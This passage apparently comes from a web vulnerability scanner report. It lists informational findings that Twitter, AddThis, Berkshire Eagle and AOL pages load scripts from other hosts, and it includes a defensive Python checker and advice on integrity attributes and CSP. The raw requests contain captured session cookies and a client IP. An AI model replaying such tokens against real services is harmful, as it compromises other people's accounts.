Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.565. http://twitter.com/webandy/status/30434889127960577

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://www.google.com/jsapi
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225124-19468-58576
ETag: "fa107757d702f63b6b092df02a673af4"
Last-Modified: Fri, 28 Jan 2011 14:32:04 GMT
X-Runtime: 0.04063
Content-Type: text/html; charset=utf-8
Content-Length: 13641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJThmNTA4MzQ5NzM2%250AYTQwNjAyZDM4ZjgxZTZkZGRjMmMzOg9jcmVhdGVkX2F0bCsIM07wzC0BOgdp%250AZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--521844e3318e79765270d6b108a654c1ec5e7ef1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.566. http://twitter.com/webandy/status/30434889127960577

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://www.google.com/jsapi
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234532-86422-2970
ETag: "aa9592f78ce2ff0143c1fdeee3dfe44b"
Last-Modified: Fri, 28 Jan 2011 17:08:52 GMT
X-Runtime: 0.05563
Content-Type: text/html; charset=utf-8
Content-Length: 13509
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--3087182e2f48f1582b6c3a9258006b035e2375c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.567. http://twitter.com/webandy/status/30434889127960577

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /webandy/status/30434889127960577

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://www.google.com/jsapi
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-88479-17443
ETag: "57ec15d6db2e642f3190ad41e31c8dd6"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.03905
Content-Type: text/html; charset=utf-8
Content-Length: 13641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJTI5OWQ2NTRkM2U2%250AN2EyOGYyMDE5ZGJhNjA0YjRhZmM2OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--84b9c2aee944901e5bd61754af202b278a459d82; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.568. http://twitter.com/zonajones

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /zonajones

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://www.google.com/jsapi
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955

Request

GET /zonajones HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-81164-11891
ETag: "18ef6945dbad6fc926ced7c8559a729e"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01559
Content-Type: text/html; charset=utf-8
Content-Length: 47763
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.569. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain (a protocol-relative src; the browser resolves it to the page's scheme, here http):

//cache.addthiscdn.com/www/q0197/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...
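Every entry in this section is the same finding: the page loads a script from a host other than the one the page was requested from, so that host (and, since every include here is plain http://, anyone on the path to it) can run code in the page's origin. The check is simple enough to reproduce. The following is an added example, not code from the crawler that generated this report: it parses a raw HTTP response in the form pasted above, collects every `<script src>`, resolves relative and protocol-relative values against the page URL, and reports the hosts that differ from the page's host. The sample response is constructed (modelled on the www.addthis.com/bookmark.php entry, with extra cases: a same-host relative include, a duplicate, a src with a trailing space as in the berkshireeagle.com entry, and a `javascript:` src), and the page URL passed in is an assumption.

```python
"""Cross-domain <script src> check, reimplemented from the finding above.

Added example; not the crawler's own code.  SAMPLE_RESPONSE is constructed,
modelled on the addthis.com entry, and SAMPLE_PAGE_URL is an assumption.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":            # HTMLParser lower-cases tag and attribute names
            return
        for name, value in attrs:
            if name == "src" and value:
                self.srcs.append(value.strip())   # one src in the report has a trailing space


def split_response(raw):
    """Split a raw HTTP response, as pasted in the report, into (status line, headers, body).

    Header names are lower-cased; repeated headers such as Set-Cookie keep every value.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status, *header_lines = head.split("\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def cross_domain_scripts(page_url, html):
    """Return, in order and without duplicates, every script URL whose host is not the page's host.

    Each src is resolved against page_url first, so a protocol-relative include
    (//cache.addthiscdn.com/...) becomes an absolute URL and is flagged, while a
    same-host relative include (/js/x.js) is not.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = ScriptSrcCollector()
    collector.feed(html)
    found = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        host = urlsplit(absolute).hostname
        if host is None:               # javascript: or data: src: no fetch from another host
            continue
        if host.lower() != page_host and absolute not in found:
            found.append(absolute)
    return found


def scan_raw_response(page_url, raw):
    """Run the check on a raw response; only HTML bodies are examined."""
    _, headers, body = split_response(raw)
    content_type = headers.get("content-type", [""])[0].lower()
    if not content_type.startswith("text/html"):
        return []
    return cross_domain_scripts(page_url, body)


# Constructed sample, not a capture: same shape as the addthis.com response above,
# plus a same-host relative include, a duplicate, a trailing-space src and a javascript: src.
SAMPLE_PAGE_URL = "http://www.addthis.com/bookmark.php"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: a=1; path=/\r\n"
    "Set-Cookie: b=2; path=/\r\n"
    "\r\n"
    "<!DOCTYPE html><html><head>\n"
    '<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>\n'
    '<script src="/js/local.js"></script>\n'
    '<script src="http://www.addthis.com/js/also-local.js"></script>\n'
    '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js "></script>\n'
    '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js"></script>\n'
    '<script src="javascript:void(0)"></script>\n'
    "</head><body></body></html>\n"
)

if __name__ == "__main__":
    for url in scan_raw_response(SAMPLE_PAGE_URL, SAMPLE_RESPONSE):
        print(url)
```

The comparison is host against host, as in the report, so a1.twimg.com counts as another domain relative to twitter.com even though both belong to the same operator; if you only care about third parties, compare registrable domains instead. The finding is informational because nothing here is exploitable by itself: the risk is that a compromise of the script host, or of the unencrypted transport, is a compromise of the including page. The controls that bound it are an `integrity` attribute (Subresource Integrity) on each include and a Content-Security-Policy `script-src` allowlist naming only the hosts that are meant to appear in this list.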

18.570. http://www.berkshireeagle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.berkshireeagle.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://extras.mnginteractive.com/live/js/mngiads/AdsInclude.js
http://extras.mnginteractive.com/live/js/otherinc/pop-window.js
http://e.yieldmanager.net/script.js
http://extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js
http://extras.mnginteractive.com/live/js/omniture/OmniUserObjAndHelper.js
http://extras.mnginteractive.com/live/js/omniture/functions.js
http://extras.mnginteractive.com/live/js/weather/custom_weather_access.js
http://extras.mnginteractive.com/live/js/mngiMenu/mngiMenu.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://img.video.ap.org/p/j/apovn.js
http://berkshireeagle.mycapture.com/datafeeds/14187.js
http://js.zvents.com/javascripts/zvents_mini.js
http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTION=HOME
http://extras.mnginteractive.com/live/js/otherinc/com_tabs.js
http://cm.npc-medianews.overture.com/partner/js/ypn.js
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/live/js/mngiads/AdsInclude.js"></script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/live/js/otherinc/pop-window.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js'></script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/OmniUserObjAndHelper.js'></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src='http://extras.mnginteractive.com/live/js/omniture/functions.js'></script>
...[SNIP]...
<!-- BEGIN FREEFORM RENDER, ID 8573368 --><script src="http://extras.mnginteractive.com/live/js/weather/custom_weather_access.js"></script>
<script type="text/javascript" src="http://extras.mnginteractive.com/live/js/mngiMenu/mngiMenu.js">
</script>
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
-->

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</h2>
<script language="JavaScript" src="http://berkshireeagle.mycapture.com/datafeeds/14187.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://js.zvents.com/javascripts/zvents_mini.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTION=HOME"></script>
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?><script xmlns:mngi="http://www.medianewsgroup.com" type="text/javascript" src="http://extras.mnginteractive.com/live/js/otherinc/com_tabs.js">/**/</script>
...[SNIP]...
</script><script type="text/javascript" src="http://cm.npc-medianews.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.571. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response (a 404 page) dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://o.aolcdn.com/journals_js/journals_blog_this.js
http://o.aolcdn.com/ads/adsWrapper.js
